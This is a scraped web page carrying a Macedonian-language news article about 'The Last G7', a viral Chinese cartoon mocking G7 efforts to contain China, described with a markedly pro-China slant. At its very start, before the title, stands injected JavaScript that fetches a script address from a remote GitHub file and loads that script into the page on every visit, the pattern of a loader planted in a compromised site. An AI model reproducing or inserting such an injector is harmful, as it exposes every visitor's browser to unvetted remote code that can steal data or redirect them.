;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); „Последниот Г7“ - генијална карикатура се исмејува со обидот за потиснување на Кина - Антропол
АктуелноИнтернационално

„Последниот Г7“ – генијална карикатура се исмејува со обидот за потиснување на Кина

Политичката сатира на кинески карикатурист, во која се исмејува со групата на 7 (Г7) земји за нивниот обид да ја потиснат Кина, стана вирална по кинеските социјални медиуми, додека самитот на Г7 се одвиваше во Корнвол, Велика Британија. Самитот претставуваше обид на САД  да ги мобилизира своите сојузници против Кина.  

Насловена „Последниот Г7“, карикатурата е заснована на „Последната вечера“ на Да Винчи. Слично како што Исус го делел последниот оброк со апостолите пред неговото распнување, во карикатурата се претставени девет животни кои ги претставуваат САД, Британија, Италија, Канада, Јапонија, Германија, Франција, Австралија и Индија – како седат околу маса на која е поставена торта во форма на мапата на Кина. На сликата стои и цитат кој вели: „Преку ова сè уште можеме да владееме со светот”.

Во центарот, на местото каде седи Исус во Тајната вечера, се наоѓа орел со кугларска капа со америчко знаме. Очигледно тој е организатор на собирот. Пред орелот има мала машина за печатење пари, која од тоалетна хартија печати долари, а нивниот број станува се’ поголем од 2 трилиони до 8 трилиони. Под нозете на орелот има и железна кука и две парчиња памук со крв, што сугерира дека „акумулацијата на капиталот на САД е изградена врз основа на расно угнетување“.

Од левата страна на орелот седи сив волк, со капче на кои стои италијанското знаме. Волкот мафта со рацете како да им вика „Не“ на американските обиди заеднички да ја сузбиваат Кина. Италија е првата европска земја која стана член на кинеската иницијатива Појас и пат и одбива да соработува со САД на потиснување на Кина. 

До волкот е Акита куче, кое ја претставува Јапонија. Без столица, кучето им служи пијалоци на другите – тура зелена радиоактивна вода во чашите на другите животни. На социјалните медиуми во Кина, ова беше интерпретирано како контаминираната вода која Јапонија планира да ја пушти во Пацификот од нуклерната централа во Фукушима. 

До кучето седи кенгур, кој ја претставува дволичната Австралија, која истовремено соработува со САД против Кина, но покажува многу волја да заработува пари од Кина, нејзиниот најголем трговски партнер. 

Во левиот агол седи црн јастреб, кој очигледно ја претставува Германија, бидејќи нејзината поза е скоро идентична со таа на германската канцеларка Ангела Меркел, на широко распространета фотографија на самитот на Г7 од 2018 година. Германија, слично со петелот (Франција) кој седи во тишина на десната страна, изгледа позаинтересирана за сопствените европски прашања и не покажува ентузијазам за америчката пропаганда. 

На десната страна од масата седат и лав и глодар кои ги претставуваат Британија и Канада. Глодарот држи кукла во раката, што беше толкувано како симбол за Менг Вангџо, директорката на Хуавеи која се уште се држи во домашен притвор во Канада. 

Во десниот агол на масата седи слон (кој ја претставува Индија) кој изгледа како истоштен пациент.

Под масата има жаба која држи банкноти во рацете и се обидува да скокне што е можно повисоко за да им даде пари на САД. Малата жаба го претставува Тајван и неговата потчинетост пред САД.